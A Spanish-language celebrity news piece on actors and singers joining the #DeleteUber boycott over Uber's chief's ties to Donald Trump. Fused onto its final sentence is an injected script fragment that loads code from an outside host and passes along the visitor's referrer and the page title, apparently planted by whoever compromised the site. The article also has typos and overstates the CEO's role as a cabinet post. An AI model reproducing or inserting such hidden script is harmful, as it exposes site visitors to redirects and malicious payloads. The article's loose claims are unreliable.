Celebridades contra Uber y Trump

Famosos se unen a #DeleteUber, tras conocer que el director general de la aplicación, Travis Kalanic forma parte del gabinete de Donald Trump

Algunas celebridades han estado manifestando su postura en contra de las declaraciones que ha hecho el presidente Donald Trump, hacia los migrantes y las nuevas políticas que planea llevar a cabo, pero ahora se ha llamado a los usuarios de Uber a dejar de utilizarla debido a que el director general de la aplicación, Travis Kalanic forma parte del gabinete del actual gobierno.

Entre los famosos que ya se han unido a la campaña #DelateUber están Lena Dunham, Amy Schumer y Jesse Tyler Ferguson, quienes mediante sus redes sociales alzaron la voz para el boicot contra Uber.

La actriz y guionista Lena Dunham, escribió en su cuenta de Twitter , “Como cuando pasas de vivir con tu novio a nunca más volverle a hablar”, y además la acompaño junto con una imagen en la que mostraba el mensaje de ‘eliminar aplicación’.

 

 

La actriz Amy Schumer también compartio compartió una imagen en Instagram donde aparee gente protestando y con un cartel que dice: “Ellos vienen a por los musulmanes y nosotros decimos: no será hoy”. Además escribió “Por favor únanse y eliminen la aplicación de Uber y suscríbanse a Lyft, que han donado un millón de dólares a la Unión estadounidense por las Libertades Civiles”.

 

 

Por su parte la protagonista de la serie “Empire”, Taraji Penda Henson, dijo “Adiós Uber. No puedo apoyar a una compañía que aprueba el odio. Así que elimino mi cuenta. La cancelo por todo lo que estamos apoyando”.

Otros de los artistas que también se unieron a la campaña están George Hosato Takei, Jesse Tyler Ferguson, Tessa Thompson, la cantante Janelle Monáe y el actor John Leguizamos.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.